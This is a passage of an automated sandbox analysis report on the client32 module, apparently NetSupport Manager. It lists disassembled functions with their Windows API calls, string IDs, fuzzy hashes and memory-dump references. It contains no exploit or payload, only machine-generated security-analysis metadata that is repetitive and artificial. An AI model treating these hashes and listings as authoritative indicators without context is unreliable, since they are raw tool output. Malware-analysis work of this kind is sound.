                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$EnterEventLeave
                                                                                                                                    • String ID: list<T> too long
                                                                                                                                    • API String ID: 3094578987-4027344264
                                                                                                                                    • Opcode ID: 110a0132b68d627c3480cc4175eb9b4aa4cacdf249c99c8a628f99512f0e9624
                                                                                                                                    • Instruction ID: 7bfaceea9a20e34aca0a829f3d9254b0af8797b3eeddb6bd678ff8280e03d006
                                                                                                                                    • Opcode Fuzzy Hash: 110a0132b68d627c3480cc4175eb9b4aa4cacdf249c99c8a628f99512f0e9624
                                                                                                                                    • Instruction Fuzzy Hash: C6314175A047059FD714CF64C984B56FBF9FB49314F10862EE8569BA44DB30F844CB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110AA7C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateWindow
                                                                                                                                    • String ID: ..\ctl32\listview.cpp$SysListView32$m_hWnd
                                                                                                                                    • API String ID: 716092398-3171529584
                                                                                                                                    • Opcode ID: a1f6a11b2d08fd775bdf40fee9275896164d6569cfebdff1e240e1b985e0d310
                                                                                                                                    • Instruction ID: 233598042db77364abfde988217b88f03a1ef401ddb8a0e60fc0a2cc0ff0e3e6
                                                                                                                                    • Opcode Fuzzy Hash: a1f6a11b2d08fd775bdf40fee9275896164d6569cfebdff1e240e1b985e0d310
                                                                                                                                    • Instruction Fuzzy Hash: 2B219F79200206AFD714DF55DC85F9BBBE9AF88318F10821DF95A97281DB70E941CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110183B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MetricsSystem$FindWindow
                                                                                                                                    • String ID: IPTip_Main_Window
                                                                                                                                    • API String ID: 3964754823-293399287
                                                                                                                                    • Opcode ID: 338d81376081f096a8910d24601292b11f0403676c3425d7a8f136870903a89b
                                                                                                                                    • Instruction ID: 48eceb47ebeb3c7c94f5e0ea21fac0982c3091e714c0091f6a40e808b7a20a73
                                                                                                                                    • Opcode Fuzzy Hash: 338d81376081f096a8910d24601292b11f0403676c3425d7a8f136870903a89b
                                                                                                                                    • Instruction Fuzzy Hash: 1411E53AD80229A7DF01DAE05E41BDE77AC5B00249F0045EBED05AB048EE69D70586E1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11005940 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(00000000), ref: 11005981
                                                                                                                                    • ReleaseDC.USER32 ref: 110059BC
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorExitLastMessageProcessReleasewsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 3704029381-2830328467
                                                                                                                                    • Opcode ID: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
                                                                                                                                    • Instruction ID: 1cf781a21872bd9441bcd9bb2c78fcf7fe1041f1c585c9da4a5e29128da7e192
                                                                                                                                    • Opcode Fuzzy Hash: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
                                                                                                                                    • Instruction Fuzzy Hash: 8C21E475A00705AFE710CB61C880BEBB7E4BF8A358F10407DE5AA4B240DB72A440CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11014310 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateWindowExA.USER32 ref: 1101434C
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateErrorExitLastMessageProcessWindowwsprintf
                                                                                                                                    • String ID: ..\ctl32\headctrl.cpp$SysHeader32$m_hWnd
                                                                                                                                    • API String ID: 2789554107-4050302278
                                                                                                                                    • Opcode ID: 7128a90106a9f6b549252445498b8c8851c41fc8150169f4254d7cc760935a86
                                                                                                                                    • Instruction ID: 47ca1da31ef5e317866de86f9591e30fe02a5225a1dd4fd0741b7edf9cd601c6
                                                                                                                                    • Opcode Fuzzy Hash: 7128a90106a9f6b549252445498b8c8851c41fc8150169f4254d7cc760935a86
                                                                                                                                    • Instruction Fuzzy Hash: 4C014B7621021ABBCB54DE99DC85EDBB7ADAF88608F008159F919A7240D630E850CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11015400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110AB01D
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                                                                                    • API String ID: 819365019-2727927828
                                                                                                                                    • Opcode ID: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                                                                    • Instruction ID: c68bebcfb275c132091ba8ffe4505af5196cb7164de974b36e44453814cc3cc0
                                                                                                                                    • Opcode Fuzzy Hash: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                                                                    • Instruction Fuzzy Hash: 4DF02B34FC0720AFD720D581EC42FCAB3D4AB05709F004469F5562A2D1E5B0B8C0C7D1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116E3C2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(mscoree.dll,?,1116E3FA,?,?,1117450F,000000FF,0000001E,111DD378,0000000C,111745BA,?,?,?,1116C592,0000000D), ref: 1116E3CC
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1116E3DC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                    • API String ID: 1646373207-1276376045
                                                                                                                                    • Opcode ID: 9d44e48514a65f6beb2b9daaf20f06df993db5571355f2c2366b7fad5b89a347
                                                                                                                                    • Instruction ID: 135e99d78eb5c1005f31d52aa6f1f3139e710bc6b7f4fa2715d19b1db760f235
                                                                                                                                    • Opcode Fuzzy Hash: 9d44e48514a65f6beb2b9daaf20f06df993db5571355f2c2366b7fad5b89a347
                                                                                                                                    • Instruction Fuzzy Hash: 2BD0123035C318B7FB155AF39E9CFAFFF5C9980B557410421F428D5904DE62D510C661
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110684E0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 164COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,20F29797,00000000,00002710,00000001,11027140,20F29797,00000000,00002710,?,?,00000000,11182BE8,000000FF,?,110294CE), ref: 1106858A
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 11068650
                                                                                                                                      • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008
                                                                                                                                    Strings
                                                                                                                                    • EnumConn error, idata=%x, xrefs: 110686C6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$DecrementEnterInterlockedLeave
                                                                                                                                    • String ID: EnumConn error, idata=%x
                                                                                                                                    • API String ID: 1807080765-705201588
                                                                                                                                    • Opcode ID: 034cf08e4a73f3bbcf5382d7acf9542c2045b6419cadcfded54175309a3fc030
                                                                                                                                    • Instruction ID: f50a52aadb97ad3236bd0d1f883a893e57f1c03978fbfaa17d5cd730c2e6c701
                                                                                                                                    • Opcode Fuzzy Hash: 034cf08e4a73f3bbcf5382d7acf9542c2045b6419cadcfded54175309a3fc030
                                                                                                                                    • Instruction Fuzzy Hash: DD519FB5E007468FE725CF54C580BAAF7F9FF48318F104AAEE85687A91D731A941CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 111718AB Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 11171646: GetOEMCP.KERNEL32(00000000,?,11177DB3,?,?,?), ref: 1117166F
                                                                                                                                      • Part of subcall function 1116AC39: Sleep.KERNEL32(00000000,00000001,?,?,1117452A,00000018,111DD378,0000000C,111745BA,?,?,?,1116C592,0000000D), ref: 1116AC5A
                                                                                                                                    • InterlockedDecrement.KERNEL32(00FA45C6), ref: 11171921
                                                                                                                                    • InterlockedIncrement.KERNEL32(00000000), ref: 11171946
                                                                                                                                    • InterlockedDecrement.KERNEL32 ref: 111719D8
                                                                                                                                    • InterlockedIncrement.KERNEL32(00000000), ref: 111719FC
                                                                                                                                      • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                      • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked$DecrementIncrement$ErrorFreeHeapLastSleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1703371082-0
                                                                                                                                    • Opcode ID: 1340d61c68f8c2c09e76a5d0293ea4f95073b939202495b7abebd3eb24fcee73
                                                                                                                                    • Instruction ID: c7e0852d625cd51334e8978cd6040bf7d01df6126bccfd2f391254aa1884d80e
                                                                                                                                    • Opcode Fuzzy Hash: 1340d61c68f8c2c09e76a5d0293ea4f95073b939202495b7abebd3eb24fcee73
                                                                                                                                    • Instruction Fuzzy Hash: 8D41E0759143569BEB01EFB4C9C034DFBE2AF09328F104969D8A1DB395EB70E842CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 111206A0 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000000,00000000,00000000,00000015,00000000,?,00000000,?,11120FD9), ref: 111206F8
                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000015,?,11120FD9), ref: 11120708
                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,?,00000000,00000000,00000000,00000015,00000000,?,11120FD9), ref: 11120722
                                                                                                                                    • InvalidateRect.USER32(00000000,00000000,00000001,?,11120FD9), ref: 11120753
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$InvalidateRect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 853580666-0
                                                                                                                                    • Opcode ID: 6100af7c05c492a17b2b380c9759d06ec65c60cf15c0b0af983956b4a661dbe4
                                                                                                                                    • Instruction ID: bfadad376760bd083310cad0da07ae4abf332c6a61674f67438e05efc1011bfd
                                                                                                                                    • Opcode Fuzzy Hash: 6100af7c05c492a17b2b380c9759d06ec65c60cf15c0b0af983956b4a661dbe4
                                                                                                                                    • Instruction Fuzzy Hash: 1A213075640304AFEB24DF54DC85F96BBA9AB88B14F204165FE586F2C6D6B0A840CBA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

